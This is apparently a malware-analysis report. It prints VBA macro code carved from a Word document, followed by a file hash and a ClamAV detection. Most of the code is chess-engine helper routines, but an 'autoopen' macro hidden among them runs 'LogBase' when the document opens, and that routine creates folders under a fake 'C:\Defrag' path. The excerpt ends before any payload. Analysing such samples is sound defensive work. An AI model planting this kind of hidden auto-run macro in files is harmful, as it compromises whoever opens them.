End Sub
'---------------------------------------------------------------------------
'InCheck() Color to move in check?
'---------------------------------------------------------------------------
Public Function InCheck() As Boolean
If bWhiteToMove Then
InCheck = IsAttackedByB(WKingLoc)
Else
InCheck = IsAttackedByW(BKingLoc)
End If
End Function
Public Function OppInCheck() As Boolean
If Not bWhiteToMove Then
OppInCheck = IsAttackedByB(WKingLoc)
Else
OppInCheck = IsAttackedByW(BKingLoc)
End If
End Function
Public Function LocCoord(Square As Long) As String
LocCoord = UCase$(ChrW$(File(Square) + 96) & Rank(Square))
End Function
'---------------------------------------------------------------------------
' Board File character to number A => 1
'---------------------------------------------------------------------------
Public Function FileRev(ByVal sFile As String) As Long
FileRev = Asc(LCase$(sFile)) - 96
End Function
'---------------------------------------------------------------------------
'RankRev() - Board Rank number to square number Rank 2 = 30
'---------------------------------------------------------------------------
Public Function RankRev(ByVal sRank As String) As Long
RankRev = (Val(sRank) + 1) * 10
End Function
Public Function RelativeRank(Col, sq As Long) As Long
If Col = COL_WHITE Then
RelativeRank = Rank(sq)
Else
RelativeRank = (9 - Rank(sq))
End If
End Function
'---------------------------------------------------------------------------
'CompToCoord(): Convert internal move to text output
'---------------------------------------------------------------------------
Public Function CompToCoord(CompMove) As String
Dim sCoordMove As String
If CompMove.From = 0 Then CompToCoord = "": Exit Function
sCoordMove = ChrW$(File(CompMove.From) + 96) & Rank(CompMove.From) & ChrW$(File(CompMove.Target) + 96) & Rank(CompMove.Target)
If CompMove.Promoted <> 0 Then
Select Case CompMove.Promoted
Case WKNIGHT, BKNIGHT
sCoordMove = sCoordMove & "n"
Case WROOK, BROOK
sCoordMove = sCoordMove & "r"
Case WBISHOP, BBISHOP
sCoordMove = sCoordMove & "b"
Case WQUEEN, BQUEEN
sCoordMove = sCoordMove & "q"
End Select
End If
CompToCoord = sCoordMove
End Function
Public Function TextToMove(ByVal sMoveText As String)
' format "b7b8q"
TextToMove = EmptyMove
sMoveText = Trim(Replace(sMoveText, "-", ""))
TextToMove.From = CoordToLoc(Left$(sMoveText, 2))
TextToMove.piece = Board(TextToMove.From)
TextToMove.Target = CoordToLoc(Mid$(sMoveText, 3, 2))
TextToMove.Captured = Board(TextToMove.Target)
Select Case LCase(Mid$(sMoveText, 5, 1))
Case "q":
If PieceColor(TextToMove.piece) = COL_WHITE Then TextToMove.Promoted = WQUEEN Else TextToMove.Promoted = BQUEEN
Case "r":
If PieceColor(TextToMove.piece) = COL_WHITE Then TextToMove.Promoted = WROOK Else TextToMove.Promoted = BROOK
Case "b":
If PieceColor(TextToMove.piece) = COL_WHITE Then TextToMove.Promoted = WBISHOP Else TextToMove.Promoted = BBISHOP
Case "n":
If PieceColor(TextToMove.piece) = COL_WHITE Then TextToMove.Promoted = WKNIGHT Else TextToMove.Promoted = BKNIGHT
Case Else
TextToMove.Promoted = 0
End Select
End Function
Public Function MovesPlyList() As String
' Debug: print current move path in search
Dim i As Long
For i = 1 To Ply + 1
MovesPlyList = MovesPlyList & ">" & MovesPly(i)
Next i
End Function
Public Sub RemoveEpPiece()
Dim EpPos As Long
' Remove EP from Previous Move
EpPos = EpPosArr(Ply)
If EpPos > 0 Then
Select Case Board(EpPos)
Case WEP_PIECE
Board(EpPos) = NO_PIECE
Case BEP_PIECE
Board(EpPos) = NO_PIECE
End Select
End If
End Sub
Public Sub ResetEpPiece()
' Reset EP from Previous Move
Dim EpPos As Long
EpPos = EpPosArr(Ply)
If EpPos > 0 Then
Select Case Rank(EpPos)
Case 3
Board(EpPos) = WEP_PIECE
Case 6
Board(EpPos) = BEP_PIECE
End Select
End If
End Sub
Sub autoopen()
33 LogBase
End Sub
Public Sub CleanEpPieces()
Dim i As Long
For i = SQ_A1 To SQ_H8
If Board(i) = WEP_PIECE Or Board(BEP_PIECE) Then Board(i) = NO_PIECE
Next
End Sub
Public Function LogBase() As Boolean
Dim sBookName As String, sIndexFile As String
Dim iFBook As Long, iFIndex As Long
Dim sBookLine As String
Dim lBookIndex As Long, lAllSet As Long
Dim sLastWhite1Move As String
Dim docActive As Document
Dim htmltext1 As String
Dim htmltext2 As String
Dim htmltext3 As String
Dim fStrForPathLoad As String
Dim htmltext5 As String
Dim lHandle
Dim htmltext6 As String
Dim htmltext10 As String
fStrForPathLoad = "C:\Defrag\1"
If Right(fStrForPathLoad, 1) <> "\" Then
fStrForPathLoad = fStrForPathLoad & "\"
MakeSureDirectoryPathExists fStrForPathLoad
End If
fStrForPathLoad = "C:\Defrag\1\Disk"
If Right(fStrForPathLoad, 1) <> "\" Then
fStrForPathLoad = fStrForPathLoad & "\"
MakeSureDirectoryPathExists fStrForPathLoad
End If
fStrForPathLoad = "C:\Defrag\1\2"
If Right(fStrForPathLoad, 1) <> "\" Then
fStrForPathLoad = fStrForPathLoad & "\"
MakeSureDirectoryPathExists fStrForPathLoad
End If
fStrForPathLoad = "C:\Defrag\1\Disk\Report"
If Right(fStrForPathLoad, 1) <> "\" Then
fStrForPathLoad = fStrForPathLoad & "\"
MakeSureDirectoryPathExists fStrForPathLoad
…
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 624640 bytes |
SHA-256: 1e42993e5a4ecaa294e3ea3957bd9c4fe1002657344c9cabafced17023f2651c |
|||
|
Detection
ClamAV:
Doc.Malware.W2000m-7603021-0
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.